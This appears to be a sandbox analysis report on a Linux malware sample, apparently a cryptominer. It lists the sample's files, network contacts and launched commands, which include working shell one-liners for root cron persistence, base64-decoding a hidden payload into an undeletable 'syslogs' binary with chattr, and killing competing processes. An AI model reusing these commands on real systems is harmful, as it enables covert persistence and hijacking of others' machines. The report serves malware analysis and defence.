Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Launches processes:
- sh -c echo \"filename='syslogs';if [ -f \$filename ] ; then kill -9 \$(cat .idlerc); chattr -ia \$filename;fi;cat .b|base64 -di >\$filename;chmod 775 \$filename;rm -f .b;chattr +ia \$filename;\"|nohup sh >/dev/null 2>&1 &
- nohup sh
- sh
- sh -c echo \"kills(){ ps ux |grep -v \$1 | awk '{if(\$3>35.0) print \$2}' | while read procid; do kill -9 \$procid; done };b=\$(cat .idlerc);if [ \$? -eq 0 ]; then kills \$b ; else kills 'syslogs'; fi; getself() { selfid=\\"grep\\"; self=\$\$; while [ \$self -gt 1 ]; do selfid=\\"\$selfid\\|\$((\$self))\\"; self=\$(ps -p \${1:-\$self} -o ppid=);done; };getself; killstr() { ps ux |grep \\"\$1\\"|grep -v \$selfid|grep -v 'grep\\|-bash\\|\$\$'|awk '{print \$2}'| while read procid; do kill -9 \$procid; done };killstr 'curl';killstr '|sh';killstr ' sh'; killstr 'bash'; sleep 1;chattr -ia <SAMPLE_FULL_PATH>;chmod 775 <SAMPLE_FULL_PATH>;chattr +ia <SAMPLE_FULL_PATH>;<SAMPLE_FULL_PATH>;\"|nohup sh >/dev/null 2>&1 &
- sh -c echo '*/1 * * * * cd /root;<SAMPLE_FULL_PATH>'|crontab
- cat .b
- base64 -di
- crontab
- sysctl -w vm.nr_hugepages=128
- cat .idlerc
- ps ux
- grep -v syslogs
- awk {if($3>35.0) print $2}
- chattr -ia syslogs
- chmod 777 syslogs
- chattr +ia syslogs
- ./syslogs
- ps -p 718 -o ppid=
- chmod 775 syslogs
- rm -f .b
- grep curl
- grep -v grep\|718
- grep -v grep\|-bash\|$$
- awk {print $2}
- ps -p 738 -o ppid=
- grep -v 789
- grep -v grep\|738
- ps -p 756 -o ppid=
- grep |sh
- grep -v 799
- grep -v grep\|756
- grep -v 839
- ps -p 791 -o ppid=
- grep sh
- ps -p 818 -o ppid=
- grep -v 863
- grep -v grep\|791
- ps -p 847 -o ppid=
- grep -v 897
- grep -v grep\|818
- grep -v 929
- ps -p 878 -o ppid=
- grep bash
- ps -p 916 -o ppid=
- grep -v 804
- ps -p 948 -o ppid=
- ps -p 980 -o ppid=
- grep -v grep\|948
- ps -p 1004 -o ppid=
- grep -v grep\|980
- ps -p 1029 -o ppid=
- grep -v grep\|1004
Kills the following processes:
- <SAMPLE>
- /bin/ps
- /var/spool/cron/syslogs
- /bin/sh
- bash
- run.sh
Performs operations with the file system:
Modifies file access rights:
- /var/spool/cron/crontabs/tmp.os5Lbx
- /root/syslogs
- /var/spool/cron/crontabs/tmp.tMkqmA
- /var/spool/cron/crontabs/tmp.ujFErR
- /var/spool/cron/crontabs/tmp.rjRV7F
- /var/spool/cron/crontabs/tmp.99abp4
- /var/spool/cron/crontabs/tmp.VfxQCC
- /var/spool/cron/crontabs/tmp.cwJJMZ
- /var/spool/cron/crontabs/tmp.2D5Mz4
- /var/spool/cron/crontabs/tmp.uEJz8N
- /var/spool/cron/crontabs/tmp.1F5lpc
- /var/spool/cron/crontabs/tmp.TB0cLr
- /var/spool/cron/crontabs/tmp.BkWa32
- /var/spool/cron/crontabs/tmp.VPKB8b
Creates or modifies files:
- /root/.historys
- /root/.b
- /root/syslogs
- /proc/sys/vm/nr_hugepages
- /var/spool/cron/crontabs/tmp.os5Lbx
- /var/spool/cron/crontabs/tmp.tMkqmA
- /var/spool/cron/crontabs/tmp.ujFErR
- /root/.idlerc
- /var/spool/cron/crontabs/tmp.rjRV7F
- /var/spool/cron/crontabs/tmp.99abp4
- /var/spool/cron/crontabs/tmp.VfxQCC
- /var/spool/cron/crontabs/tmp.cwJJMZ
- /var/spool/cron/crontabs/tmp.2D5Mz4
- /var/spool/cron/crontabs/tmp.uEJz8N
- /var/spool/cron/crontabs/tmp.1F5lpc
- /var/spool/cron/crontabs/tmp.TB0cLr
- /var/spool/cron/crontabs/tmp.BkWa32
- /var/spool/cron/crontabs/tmp.VPKB8b
Deletes files:
- /var/spool/cron/.b
Network activity:
Establishes connection:
- 15#.##9.48.33:80
Sends data to the following servers:
- 15#.##9.48.33:80
Receives data from the following servers:
- 15#.##9.48.33:80
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
